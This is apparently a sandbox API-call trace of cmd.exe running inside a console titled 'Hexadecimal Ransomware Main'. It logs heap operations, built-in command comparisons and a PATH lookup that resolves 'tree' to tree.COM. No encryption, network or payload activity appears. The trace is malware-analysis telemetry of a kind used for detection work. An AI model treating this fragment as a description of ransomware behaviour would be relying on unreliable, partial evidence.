GetProcessHeap () returned 0x1dc256b0000 [0106.874] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0106.874] GetProcessHeap () returned 0x1dc256b0000 [0106.874] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0106.874] _get_osfhandle (_FileHandle=3) returned 0x9c [0106.874] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0106.874] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x198, lpOverlapped=0x0) returned 1 [0106.874] SetFilePointer (in: hFile=0x9c, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0106.874] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=6, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="tree\r\nHexadecimal Ransomware Main\r\n") returned 6 [0106.874] _get_osfhandle (_FileHandle=3) returned 0x9c [0106.874] GetFileType (hFile=0x9c) returned 0x1 [0106.874] _get_osfhandle (_FileHandle=3) returned 0x9c [0106.874] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0106.874] GetProcessHeap () returned 0x1dc256b0000 [0106.875] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256c0860 [0106.875] GetProcessHeap () returned 0x1dc256b0000 [0106.875] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0860) returned 1 [0106.875] _wcsicmp (_String1="tree", _String2=")") returned 75 [0106.875] _wcsicmp (_String1="FOR", _String2="tree") returned -14 [0106.875] _wcsicmp (_String1="FOR/?", _String2="tree") returned -14 [0106.875] _wcsicmp (_String1="IF", _String2="tree") returned -11 [0106.875] _wcsicmp (_String1="IF/?", _String2="tree") returned -11 [0106.876] _wcsicmp (_String1="REM", _String2="tree") returned -2 [0106.876] _wcsicmp (_String1="REM/?", _String2="tree") returned -2 [0106.876] GetProcessHeap () returned 0x1dc256b0000 [0106.876] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0106.876] GetProcessHeap () returned 0x1dc256b0000 [0106.876] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0106.876] _tell (_FileHandle=3) returned 87 [0106.876] _close (_FileHandle=3) returned 0 [0106.877] malloc (_Size=0xffce) returned 0x1dc257e0160 [0106.878] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0106.878] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.878] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.878] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.878] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.878] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.878] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.878] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.878] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.878] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.879] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.879] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.879] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.879] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.879] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.879] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.879] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.879] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.879] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.879] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.879] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.879] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.879] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.879] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.879] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.879] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.879] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.879] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.879] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.879] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.879] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.879] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.879] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.879] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.880] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.880] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.880] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.880] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.880] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.880] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.880] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.880] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.880] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.880] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.880] malloc (_Size=0xffce) returned 0x1dc257f0140 [0106.880] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0106.881] GetProcessHeap () returned 0x1dc256b0000 [0106.881] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d86c0 [0106.884] SetErrorMode (uMode=0x0) returned 0x0 [0106.884] SetErrorMode (uMode=0x1) returned 0x0 [0106.884] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d86d0, lpFilePart=0x407419ecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419ecc0*="Desktop") returned 0x17 [0106.884] SetErrorMode (uMode=0x0) returned 0x1 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.884] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d86c0, Size=0x4a) returned 0x1dc256d86c0 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.884] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d86c0) returned 0x4a [0106.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0106.884] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.884] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd9e0 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.884] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be260 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.884] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be260, Size=0x1be) returned 0x1dc256be260 [0106.884] GetProcessHeap () returned 0x1dc256b0000 [0106.885] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be260) returned 0x1be [0106.885] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.885] GetProcessHeap () returned 0x1dc256b0000 [0106.885] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256bcf80 [0106.885] GetProcessHeap () returned 0x1dc256b0000 [0106.885] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf80, Size=0x7e) returned 0x1dc256bcf80 [0106.885] GetProcessHeap () returned 0x1dc256b0000 [0106.885] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf80) returned 0x7e [0106.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.885] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0106.885] GetLastError () returned 0x2 [0106.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.885] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0xffffffffffffffff [0106.886] GetLastError () returned 0x2 [0106.886] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.886] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256beae0 [0106.886] FindClose (in: hFindFile=0x1dc256beae0 | out: hFindFile=0x1dc256beae0) returned 1 [0106.886] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419ea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ea30) returned 0x1dc256bee40 [0106.886] FindClose (in: hFindFile=0x1dc256bee40 | out: hFindFile=0x1dc256bee40) returned 1 [0106.886] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0106.887] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0106.887] ??_V@YAXPEAX@Z () returned 0x1 [0106.887] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0106.891] malloc (_Size=0xffce) returned 0x1dc257f0140 [0106.891] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0106.891] malloc (_Size=0xffce) returned 0x1dc25800120 [0106.891] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0106.891] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.891] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.891] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.892] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.892] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.892] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.892] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.892] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.892] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.892] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.892] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.892] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.892] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.892] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.892] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.892] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.892] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.892] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.892] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.892] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.892] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.892] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.892] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.892] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.892] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.892] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.892] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.892] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.892] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.892] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.893] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.893] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.893] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.893] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.893] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.893] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.893] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.893] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.893] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.893] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.893] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.893] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.893] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.893] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.893] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.893] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.893] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.893] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.893] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.893] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.893] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.893] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.893] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.893] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.893] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.894] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.894] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.894] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.894] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.894] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.894] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.894] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.894] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.894] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.894] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.894] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.894] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.894] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.894] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.894] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.894] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.894] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.894] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.894] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.894] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.894] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.894] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.894] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.894] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.894] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.894] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.895] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.895] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.895] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.895] _wcsicmp (_String1="tree", _String2="FOR") returned 14 [0106.895] _wcsicmp (_String1="tree", _String2="IF") returned 11 [0106.895] _wcsicmp (_String1="tree", _String2="REM") returned 2 [0106.895] ??_V@YAXPEAX@Z () returned 0x1 [0106.895] GetProcessHeap () returned 0x1dc256b0000 [0106.895] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d8720 [0106.895] GetProcessHeap () returned 0x1dc256b0000 [0106.895] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256bbb60 [0106.895] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.895] malloc (_Size=0xffce) returned 0x1dc25800120 [0106.896] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0106.897] GetProcessHeap () returned 0x1dc256b0000 [0106.897] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256e8710 [0106.898] SetErrorMode (uMode=0x0) returned 0x0 [0106.898] SetErrorMode (uMode=0x1) returned 0x0 [0106.898] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256e8720, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e520*="Desktop") returned 0x17 [0106.898] SetErrorMode (uMode=0x0) returned 0x1 [0106.898] GetProcessHeap () returned 0x1dc256b0000 [0106.898] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256e8710, Size=0x4a) returned 0x1dc256e8710 [0106.898] GetProcessHeap () returned 0x1dc256b0000 [0106.898] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256e8710) returned 0x4a [0106.899] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0106.899] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd470 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be430 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be430, Size=0x1be) returned 0x1dc256be430 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be430) returned 0x1be [0106.899] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256be600 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be600, Size=0x7e) returned 0x1dc256be600 [0106.899] GetProcessHeap () returned 0x1dc256b0000 [0106.899] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be600) returned 0x7e [0106.899] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.899] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0106.900] GetLastError () returned 0x2 [0106.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.900] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0106.900] GetLastError () returned 0x2 [0106.900] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.900] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bee40 [0106.901] FindClose (in: hFindFile=0x1dc256bee40 | out: hFindFile=0x1dc256bee40) returned 1 [0106.901] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bed80 [0106.901] FindClose (in: hFindFile=0x1dc256bed80 | out: hFindFile=0x1dc256bed80) returned 1 [0106.901] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0106.901] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0106.901] ??_V@YAXPEAX@Z () returned 0x1 [0106.902] GetConsoleTitleW (in: lpConsoleTitle=0x407419e810, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0106.907] InitializeProcThreadAttributeList (in: lpAttributeList=0x407419e730, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x407419e620 | out: lpAttributeList=0x407419e730, lpSize=0x407419e620) returned 1 [0106.907] UpdateProcThreadAttribute (in: lpAttributeList=0x407419e730, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e60c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x407419e730, lpPreviousValue=0x0) returned 1 [0106.907] GetStartupInfoW (in: lpStartupInfo=0x407419e6c0 | out: lpStartupInfo=0x407419e6c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0106.907] GetProcessHeap () returned 0x1dc256b0000 [0106.907] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256b1640 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.907] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.908] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.909] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 